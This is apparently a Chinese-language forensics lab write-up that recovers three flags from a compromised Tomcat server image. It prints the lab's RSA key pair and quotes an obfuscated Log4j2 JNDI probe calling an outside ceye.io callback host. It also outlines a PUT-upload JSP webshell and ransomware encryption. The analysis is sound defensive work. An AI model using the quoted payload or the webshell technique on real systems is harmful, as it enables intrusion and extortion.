convert -f raw -O vmdk .\vuln_m-j6cegcrhehdcba0r5h4v_system.raw vuln_m-j6cegcrhehdcba0r5h4v_system.vmdk将靶场的 raw 原始磁盘镜像转换成 VMware 可以直接加载使用的 vmdk 虚拟硬盘文件。flag1先看一下history有记录一条flag就在历史命令里flag2RSA 一种非对称加密算法有两把钥匙一把公钥public key、一把私钥private key公钥加密 → 只能私钥解密私钥加密 → 只能公钥解密互相不能反过来。.pem是一种密钥 / 证书文件格式常见于 SSH 私钥、SSL 证书、加密密钥pubkey.pem 公钥文件Public Keyfind找到公钥文件路径并查看公钥-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAIaYjiaQIwYWR9sH8ULSWZEvclf1Zpk97yhvJOqF5E6khnG1e0v08Uix9aEoecWPv/INFprInqxXMTDxkr1PPrg3g2N/nxfqtUobcliKwALjqnvF3y6Xm4KMwOwX5PN41/8MSh7yZm1olDPWlZKqtpBGkNaZbvbby27iEqfxAgMBAAE-----END RSA PUBLIC KEY-----privkey.pem 私钥文件私钥-----BEGIN RSA PRIVATE KEY-----MIICXwIBAAKBgQCGmI4vmkCMGFkfbB/FC0lmRL3JX9WaZPe8obyTqheROpIZxvtXtL9PFIsfWhKHnFj7/yDRaayJ6sVzEw8ZK9fjz64N4Nvjf58X6rVKG3JYisAC46p7xd8ul5uCjMDsFTzeNf/DEoe8mZtaJQz1pWSqraQRpDWmW7228tu4hKn8QIDAQABAoGANLacwTH1Y6jJhs/u5VoVRhNYDP0WiCBREjR5yY9NKZi5zZSrrV7hqhQOpJm/NhNaml8COGHdrCohaH8nJbHDDdPXxuHltnHrERGSIaybOYRlFUfxM3/qdQjgYocpmK1Drodb3MuW1Ef0sypD5olvsmNV8ldRNOxX2Bpc9XN/tECRQCeJOdsX/da6BxV7hYm3u5l7PrJviZg4AvUuIWDqr7SqsTrQGEO9jga8erJ3mm1xIJvRvaK9ebTrc1K6xVR6hAEc9O5QI9ANnhcCfSyi2fmOMh2pKPlx2Gwsu2/teeAoY8ZH620ofsyGg0u2/ZkNbahKNzYfXR5EaI7NiXNERhYHQJEeL6Ii7CB9cC0cUk2KzhrKTRnnM2bkTiA5qXJj6Zz9Ne4peXA4turvQCZfsRDx1o0XmHLw/eYNArBcfAnqRFjBWNCRkCPBbLBxxQjcRMkxxG70OnUK7LjFBAvbsP1NgmYYm0rGSbOPbWXvNSG6DDCvt4EJZJ75XntHiMSTXbJhat4QJEXYXYwPJ9hz1LP07IyWw1rzhJgczC87YRWi78j3UzW21RgTBq/ALT2JH2ACGh21kW6Cl9T2GC7Ro3YUgRFJjRJcAcsM-----END RSA PRIVATE KEY-----密钥AuXkLqSjNieysLjjYxz9/XKnZ0l5iyhvBi4/zXw7LBBD/LykamEm5MrEIboYoL/zYEAhvCf2a84e9ApJxsBrzcwCLSxv77dbkqzLy9W127e1k0iz1SM60W2315Yq1aYeEWcznVrzY9qrjtv/eXXOVEMUHONm3VLCs3mHDc0flag3看history可知该网站是基于Tomcat搭建而成而Tomcat的日志一般都在/opt/tomcat/logs攻击画像Tomcat PUT 漏洞就是 允许攻击者通过 HTTP PUT 方法上传恶意文件如 JSP 木马进而远程控制服务器 的高危漏洞解码后${::-y}${${6pr:-j}nd${env:fm4:-i}:d${xyf::-n}s://log48.xxx.ceye.io/a}这是一次 Log4j2 远程代码执行漏洞攻击探测属于典型的自动化漏洞扫描行为探测漏洞是否存在。攻击者通过tomcat的put漏洞上传了一个上传了jsp木马把木马更名为404.jsp通过shell执行命令并在受害者机器上生成了rsa的公私钥通过公钥对于关键数据进行了加密将index.jsp文件替换为勒索界面